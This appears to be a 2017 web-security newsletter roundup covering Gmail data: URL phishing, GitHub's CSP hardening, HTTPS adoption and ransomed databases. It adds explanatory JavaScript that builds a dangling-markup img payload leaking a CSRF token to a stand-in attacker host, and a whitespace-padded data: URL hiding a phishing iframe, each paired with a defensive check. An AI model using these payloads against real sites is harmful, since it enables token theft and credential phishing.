This one, "… is the closest I've ever come to falling for a Gmail phishing attack", describes a really clever attack. An embedded image that looks like an attachment links to a data:text/html URL. The URL starts with a plausible-looking Google address, so the beginning of the address bar looks right; only after a long run of spaces, pushed out of view, comes the markup that actually loads the phishing site in an iframe. The giveaway is the data: scheme at the very start of the address bar, not the Google-looking text after it. A lot to watch out for in 2017, including this:
A short story about how encryption can go very wrong with a (Ruby) workflow we’re all guilty of using.
The ongoing Content-Security-Policy journey at GitHub.
This time focusing on images and dangling markup. That's when an attacker injects an <img> tag whose src attribute is never closed: the browser treats the rest of the page's HTML, up to the next matching quote, as part of the image URL and sends it to the attacker's server, CSRF tokens included.
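To make the dangling-markup mechanics concrete, here is an added example (not GitHub's code) that emulates what the HTML tokenizer does with an unclosed src attribute and then checks the resulting request against a CSP img-src directive. The page template, the token value, the site origin https://app.example and the attacker host attacker.invalid are all constructed for the demonstration.

```javascript
// Added example, not GitHub's code: how a dangling-markup injection turns the
// rest of a page into an image URL, and how a CSP img-src directive stops the
// leak. The page template, token value, site origin and attacker host are all
// constructed for the demonstration.

const SITE_ORIGIN = 'https://app.example'; // hypothetical origin serving the page

// Server-rendered page with an unescaped user-controlled value at {{name}}.
const PAGE_TEMPLATE = [
  '<h1>Hello, {{name}}</h1>',
  '<form method="post" action="/settings">',
  '  <input type="hidden" name="authenticity_token" value="tok_4f3c0d">',
  '  <button>Save</button>',
  '</form>',
].join('\n');

function render(name) {
  return PAGE_TEMPLATE.replace('{{name}}', () => name); // no escaping: this is the bug
}

// Emulate the HTML tokenizer's quoted-attribute-value state for the injected
// <img>: the src value runs from the opening quote to the next identical quote
// (or to the end of the document), swallowing whatever markup lies in between.
function danglingImgSrc(html, opener) {
  const start = html.indexOf(opener);
  if (start < 0) return null;
  const quote = opener[opener.length - 1];
  const valueStart = start + opener.length;
  const end = html.indexOf(quote, valueStart);
  const value = end < 0 ? html.slice(valueStart) : html.slice(valueStart, end);
  // Browsers strip ASCII tab, CR and LF from a URL before fetching it.
  return value.replace(/[\t\r\n]/g, '');
}

// Minimal img-src check: 'self', '*' and exact origins only (real CSP source
// matching also handles schemes, wildcard hosts and paths).
function cspAllowsImage(policy, url) {
  const directives = new Map(
    policy.split(';').map(d => d.trim()).filter(Boolean)
      .map(d => { const [name, ...sources] = d.split(/\s+/); return [name, sources]; }));
  const sources = directives.get('img-src') || directives.get('default-src') || ['*'];
  const origin = new URL(url).origin;
  return sources.some(s => s === '*' || s === origin || (s === "'self'" && origin === SITE_ORIGIN));
}

// Payload quoting matters: the attacker picks the quote character the page
// does not use, so the attribute value runs to the end of the document.
const leakAll = danglingImgSrc(render("<img src='https://attacker.invalid/?"), "<img src='");
const leakShort = danglingImgSrc(render('<img src="https://attacker.invalid/?'), '<img src="');
const POLICY = "default-src 'self'; img-src 'self' https://cdn.example";

console.log('single-quote payload leaks:', leakAll);
console.log('double-quote payload leaks:', leakShort);
console.log('fetch allowed by CSP?', cspAllowsImage(POLICY, leakAll));
```

With the single-quote payload the leaked URL carries the whole form, hidden authenticity_token included, because the page itself only uses double quotes; the double-quote payload stops at the first `"` after `method=`. A policy whose img-src lists only 'self' and a known CDN makes the browser refuse the request to attacker.invalid, which is the point of GitHub tightening that directive. Chrome has since added a separate mitigation that refuses to fetch URLs containing both a raw `<` and a newline, but restricting img-src does not depend on it.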
A new two-factor authentication recovery process at GitHub for users locked out of their account: using Facebook.
For the first time, more than half of the web traffic seen by Firefox is HTTPS.
Chrome 56 and Firefox 51 now mark HTTP pages with password or credit card input fields as "Not Secure".
Mozilla's coding and security checklist for its services.
Ransom attacks are moving to the web stack: check that your MongoDB, Elasticsearch, Redis, Cassandra and Hadoop instances are not reachable from the internet without authentication.
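Back to the first item, the data: URL trick in the Gmail phishing attack. The following is an added example, not code from the linked write-up: it splits a data: URL into media type and body and reports what a user sees at the front of the address bar versus the markup hidden behind the whitespace. The sample URL, its Google-looking prefix and the iframe target host login-page.invalid are constructed for the demonstration.

```javascript
// Added example, not code from the linked write-up: dissect a data: URL of the
// shape used in the Gmail attack. The sample below is constructed for
// illustration; the Google-looking prefix and the iframe target host are
// hypothetical.
const SAMPLE_URL =
  'data:text/html,https://accounts.google.com/ServiceLogin?service=mail&continue=https://mail.google.com/mail/' +
  ' '.repeat(200) +
  '<iframe src="https://login-page.invalid/gmail.html" style="border:0"></iframe>';

// Split a data: URL into its media type and decoded body. Returns null for
// anything that is not a data: URL.
function parseDataUrl(url) {
  if (!/^data:/i.test(url)) return null;
  const comma = url.indexOf(',');
  if (comma < 0) return null;
  const params = url.slice(5, comma).split(';').map(p => p.trim());
  const mime = params[0] || 'text/plain';
  const isBase64 = params.slice(1).some(p => p.toLowerCase() === 'base64');
  const raw = url.slice(comma + 1);
  let body;
  if (isBase64) {
    body = typeof Buffer !== 'undefined'
      ? Buffer.from(raw, 'base64').toString('utf8')
      : atob(raw);
  } else {
    // Percent-decode; fall back to the raw text if the encoding is malformed.
    try { body = decodeURIComponent(raw); } catch (e) { body = raw; }
  }
  return { mime, isBase64, body };
}

// Report what a user sees at the front of the address bar versus what the
// browser actually renders. The visible part is everything before the first
// whitespace run; the hidden part is everything after it.
function analyzeDataUrl(url) {
  const parsed = parseDataUrl(url);
  if (!parsed) {
    return { isDataUrl: false, mime: null, visibleHost: null, gapLength: 0, hiddenMarkup: false, suspicious: false };
  }
  const [, visible, gap, hidden] = parsed.body.match(/^(\S*)(\s*)([\s\S]*)$/);
  const lookalike = /^https?:\/\/([^\s/?#]+)/i.exec(visible);
  const hiddenMarkup = /<(iframe|script|form|object|embed|meta)\b/i.test(hidden);
  return {
    isDataUrl: true,
    mime: parsed.mime,
    visibleHost: lookalike ? lookalike[1].toLowerCase() : null,
    gapLength: gap.length,
    hiddenMarkup,
    // An HTML data: URL that opens with a real-looking https:// address and
    // buries markup behind whitespace is the pattern to flag.
    suspicious: /^text\/html$/i.test(parsed.mime) && lookalike !== null && hiddenMarkup,
  };
}

console.log(analyzeDataUrl(SAMPLE_URL));
```

Run under Node and it prints the analysis of the sample: an HTML data: URL, a visible host of accounts.google.com, a 200-character gap and hidden markup, so suspicious is true. The same check belongs in whatever scans links in mail or user-submitted content; any href that starts with data:text/html deserves scrutiny no matter what follows. Chrome and Firefox have since blocked top-level navigation to data: URLs initiated by web content, which closes this particular door.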
Like this kind of article?
Subscribe to hear about new Rails security resources first. Only helpful articles and guides. Monthly(ish) updates, no spam.